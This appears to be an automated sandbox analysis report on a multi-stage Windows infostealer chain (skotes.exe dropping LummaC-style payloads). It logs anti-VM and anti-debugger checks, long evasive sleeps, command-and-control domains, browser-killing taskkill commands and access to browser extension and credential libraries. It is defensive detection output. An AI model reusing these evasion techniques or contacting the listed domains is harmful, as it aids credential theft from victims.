Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Special instruction interceptor: First address: C24EB3 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Special instruction interceptor: First address: CA9490 instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe Code function: 0_2_04EE079A rdtsc 0_2_04EE079A
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 801 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 968 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 2213 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 925 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe Window / User API: threadDelayed 576
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\nss3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\vcruntime140[1].dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe API coverage: 0.8 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5680 Thread sleep count: 43 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5680 Thread sleep time: -86043s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6784 Thread sleep count: 801 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6784 Thread sleep time: -1602801s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6844 Thread sleep count: 305 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6844 Thread sleep time: -9150000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6552 Thread sleep count: 968 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6552 Thread sleep time: -1936968s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2316 Thread sleep count: 2213 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2316 Thread sleep time: -4428213s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2104 Thread sleep time: -540000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4512 Thread sleep count: 925 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4512 Thread sleep time: -1850925s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe TID: 6128 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe TID: 5744 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe TID: 4296 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe TID: 1816 Thread sleep count: 94 > 30
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe TID: 1816 Thread sleep time: -564000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1001137001\num.exe TID: 6536 Thread sleep count: 192 > 30
Source: C:\Users\user\AppData\Local\Temp\1001137001\num.exe TID: 6536 Thread sleep time: -1152000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1001137001\num.exe TID: 1252 Thread sleep count: 91 > 30
Source: C:\Users\user\AppData\Local\Temp\1001137001\num.exe TID: 1252 Thread sleep time: -546000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe TID: 4568 Thread sleep time: -30000s >= -30000s
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C8BC930 GetSystemInfo,VirtualAlloc,GetSystemInfo,VirtualFree,VirtualAlloc, 8_2_6C8BC930
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: skotes.exe, skotes.exe, 00000006.00000002.3326794267.0000000001083000.00000040.00000001.01000000.00000007.sdmp, f84005b97f.exe, 00000007.00000002.2824716537.00000000009B8000.00000040.00000001.01000000.00000009.sdmp, 7e96f85771.exe, 7e96f85771.exe, 00000008.00000002.3166267260.0000000000BFE000.00000040.00000001.01000000.0000000A.sdmp, f84005b97f.exe, 00000009.00000002.2948490794.00000000009B8000.00000040.00000001.01000000.00000009.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: skotes.exe, 00000006.00000002.3323108552.0000000000906000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW`!
Source: 7e96f85771.exe, 00000008.00000002.3201117292.0000000029971000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: 7e96f85771.exe, 00000008.00000002.3201117292.0000000029971000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: f84005b97f.exe, 00000009.00000002.2949821023.0000000000F39000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2945007725.0000000000F39000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWhA
Source: skotes.exe, 00000006.00000002.3323108552.000000000094A000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000007.00000003.2812942208.0000000001481000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000007.00000002.2826107059.0000000001471000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000007.00000002.2826107059.0000000001481000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000007.00000003.2812942208.0000000001471000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000007.00000003.2823586577.0000000001471000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000007.00000002.2826045123.00000000013FE000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000007.00000003.2823586577.0000000001481000.00000004.00000020.00020000.00000000.sdmp, 7e96f85771.exe, 00000008.00000002.3168952289.0000000001482000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000002.2949626105.0000000000ECB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: 7e96f85771.exe, 00000008.00000002.3168952289.000000000140E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: firefox.exe, 00000017.00000002.3089180136.000002881EFC2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW : 2 : 34 : 1 : 1 : 0x20026 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 1234191b-4bf7-4ca7-86e0-dfd7c32b5445
Source: 7e96f85771.exe, 00000008.00000002.3201117292.0000000029971000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: firefox.exe, 00000017.00000002.3086539959.0000028814EA0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWi
Source: g4Cyr2T5jq.exe, 00000000.00000002.2170856127.00000000006E3000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.2193997224.0000000001083000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000003.00000002.2204224650.0000000001083000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000002.3326794267.0000000001083000.00000040.00000001.01000000.00000007.sdmp, f84005b97f.exe, 00000007.00000002.2824716537.00000000009B8000.00000040.00000001.01000000.00000009.sdmp, 7e96f85771.exe, 00000008.00000002.3166267260.0000000000BFE000.00000040.00000001.01000000.0000000A.sdmp, f84005b97f.exe, 00000009.00000002.2948490794.00000000009B8000.00000040.00000001.01000000.00000009.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: 7e96f85771.exe, 00000008.00000002.3201117292.0000000029971000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: 7e96f85771.exe, 00000008.00000002.3168952289.0000000001453000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWdH
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Thread information set: HideFromDebugger
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe Code function: 0_2_04EE079A rdtsc 0_2_04EE079A
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Code function: 7_2_00815BB0 LdrInitializeThunk, 7_2_00815BB0
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C905FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose, 8_2_6C905FF0
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C8A3480 ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ,GetCurrentProcess,GetProcessTimes,LoadLibraryW,GetProcAddress,__Init_thread_footer,__aulldiv,FreeLibrary,GetSystemTimeAsFileTime, 8_2_6C8A3480
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00EB652B mov eax, dword ptr fs:[00000030h] 6_2_00EB652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00EBA302 mov eax, dword ptr fs:[00000030h] 6_2_00EBA302
Enables debug privileges
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C8DB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 8_2_6C8DB66C
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C8DB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_6C8DB1F7
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Memory protected: page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: 7e96f85771.exe PID: 1672, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\num[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1001137001\num.exe, type: DROPPED
LummaC encrypted strings found
Source: f84005b97f.exe String found in binary or memory: licendfilteo.site
Source: f84005b97f.exe String found in binary or memory: clearancek.site
Source: f84005b97f.exe String found in binary or memory: bathdoomgaz.store
Source: f84005b97f.exe String found in binary or memory: spirittunek.store
Source: f84005b97f.exe String found in binary or memory: dissapoiznw.store
Source: f84005b97f.exe String found in binary or memory: studennotediw.store
Source: f84005b97f.exe String found in binary or memory: mobbipenju.store
Source: f84005b97f.exe String found in binary or memory: eaglepawnoy.store
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe "C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe "C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe "C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001137001\num.exe "C:\Users\user\AppData\Local\Temp\1001137001\num.exe" Jump to behavior
Uses taskkill to terminate processes
Source: C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: 88edf6a100.exe, 0000000A.00000000.2929918715.0000000000532000.00000002.00000001.01000000.0000000B.sdmp, 88edf6a100.exe, 0000001D.00000000.3069044721.0000000000532000.00000002.00000001.01000000.0000000B.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: 7e96f85771.exe, 7e96f85771.exe, 00000008.00000002.3166267260.0000000000BFE000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: ~Program Manager
Source: f84005b97f.exe, 00000007.00000002.2825170638.00000000009FE000.00000040.00000001.01000000.00000009.sdmp Binary or memory string: |Program Manager
Source: firefox.exe, 00000017.00000002.3080139438.000000CF3BAFB000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: ?Progman
Source: skotes.exe, skotes.exe, 00000006.00000002.3326794267.0000000001083000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: BXProgram Manager
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00E9D3E2 cpuid 6_2_00E9D3E2
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1001137001\num.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1001137001\num.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Queries volume information: C:\ VolumeInformation Jump to behavior
